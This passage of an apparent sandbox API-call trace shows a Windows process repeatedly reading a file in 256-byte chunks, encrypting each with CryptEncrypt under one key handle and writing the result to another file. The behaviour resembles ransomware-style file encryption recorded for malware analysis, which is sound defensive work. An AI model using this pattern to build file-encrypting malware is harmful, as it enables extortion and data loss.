lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.973] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.973] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.973] GetLastError () returned 0x0 [0169.973] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.973] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.973] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.973] GetLastError () returned 0x0 [0169.973] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.973] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.973] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.973] GetLastError () returned 0x0 [0169.973] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.973] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.973] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.973] GetLastError () returned 0x0 [0169.973] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.973] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.973] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.973] GetLastError () returned 0x0 [0169.973] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.974] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.974] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.974] GetLastError () returned 0x0 [0169.974] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.974] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.974] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.974] GetLastError () returned 0x0 [0169.974] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.974] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.974] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.974] GetLastError () returned 0x0 [0169.974] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.974] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.974] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.974] GetLastError () returned 0x0 [0169.974] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.975] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.975] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.975] GetLastError () returned 0x0 [0169.975] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.975] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.975] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.975] GetLastError () returned 0x0 [0169.975] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.975] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.975] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.975] GetLastError () returned 0x0 [0169.975] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.975] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.975] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.975] GetLastError () returned 0x0 [0169.975] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.975] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.976] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.976] GetLastError () returned 0x0 [0169.976] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.976] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.976] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.976] GetLastError () returned 0x0 [0169.976] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.976] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.976] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.976] GetLastError () returned 0x0 [0169.976] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.976] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.976] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.976] GetLastError () returned 0x0 [0169.976] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.977] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.977] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.977] GetLastError () returned 0x0 [0169.977] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.977] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.977] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.977] GetLastError () returned 0x0 [0169.977] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.977] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.977] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.977] GetLastError () returned 0x0 [0169.977] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.977] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.977] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.977] GetLastError () returned 0x0 [0169.977] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.978] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.978] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.978] GetLastError () returned 0x0 [0169.978] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.978] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.978] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.978] GetLastError () returned 0x0 [0169.978] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.978] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.978] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.978] GetLastError () returned 0x0 [0169.978] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.979] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.979] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.979] GetLastError () returned 0x0 [0169.979] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.979] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.979] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.979] GetLastError () returned 0x0 [0169.979] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.979] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.979] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.979] GetLastError () returned 0x0 [0169.979] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.979] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.979] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.980] GetLastError () returned 0x0 [0169.980] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.980] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.980] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.980] GetLastError () returned 0x0 [0169.980] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.980] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.980] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.980] GetLastError () returned 0x0 [0169.980] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.980] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.980] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.980] GetLastError () returned 0x0 [0169.980] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.980] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.981] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.981] GetLastError () returned 0x0 [0169.981] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, 